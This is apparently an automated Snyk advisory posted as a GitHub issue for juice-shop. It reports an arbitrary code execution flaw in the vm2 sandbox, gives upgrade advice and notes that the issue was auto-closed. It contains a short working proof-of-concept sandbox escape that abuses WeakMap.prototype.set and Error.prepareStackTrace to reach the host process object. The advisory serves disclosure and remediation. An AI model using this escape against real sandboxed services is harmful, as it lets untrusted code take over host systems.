Critical severity - Arbitrary Code Execution vulnerability in vm2 (package.json)

[github-actions]

• Package Manager: npm
• Vulnerable module: vm2
• Introduced through: juice-shop@12.3.0, juicy-chat-bot@0.6.5 and others

Detailed paths

• Introduced through: juice-shop@12.3.0 › juicy-chat-bot@0.6.5 › vm2@3.9.3

Overview

vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.
Affected versions of this package are vulnerable to Arbitrary Code Execution due to the usage of prototype lookup for the WeakMap.prototype.set method. Exploiting this vulnerability leads to access to a host object and a sandbox compromise.

PoC

const { VM } = require('vm2');
new VM().run(`
const { set } = WeakMap.prototype;
WeakMap.prototype.set = function(v) {
return set.call(this, v, v);
};
Error.prepareStackTrace =
Error.prepareStackTrace =
(_, c) => c.map(c => c.getThis()).find(a => a);
const { stack } = new Error();
Error.prepareStackTrace = undefined;
stack.process.exit(1);
`);

// Never gets executed.
console.log('Finished');

Remediation

Upgrade vm2 to version 3.9.10 or higher.

References

• GitHub Commit
• GitHub Issue
• GitHub PR
  
  SNYK-JS-VM2-2990237
  (CVE-2022-25893) vm2@3.9.3

[github-actions]

auto-closed by snyk_sarif_to_gh_issues
reason: snyk issues no longer exists